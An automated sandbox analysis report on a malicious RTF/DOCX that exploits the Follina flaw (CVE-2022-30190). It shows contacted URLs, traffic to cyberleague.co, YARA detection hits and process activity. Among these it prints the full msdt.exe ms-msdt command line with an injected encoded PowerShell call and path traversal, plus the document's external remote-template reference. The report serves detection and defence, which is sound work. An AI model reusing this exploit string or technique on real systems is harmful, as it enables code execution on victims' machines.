        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://management.azure.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://management.azure.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officeapps.live.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://osi.office.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://roaming.edog.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://settings.outlook.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://tasks.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknownDNS traffic detected: queries for: cyberleague.co
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
        Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
        Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 7100, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: 20220531_180800.rtf.LNK.0.drLNK file: ..\..\..\..\..\Desktop\20220531_180800.rtf
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{76F41A02-472B-4714-A15B-4E9746E42478} - OProcSessId.datJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
        Source: classification engineClassification label: mal72.expl.evad.winRTF@5/15@2/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

        Data Obfuscation

        barindex
        Obfuscated document found, RTF is a DOCX
        Source: 20220531_180800.rtfInitial file: Document starts with PK

        Persistence and Installation Behavior

        barindex
        Contains an external reference to another file
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
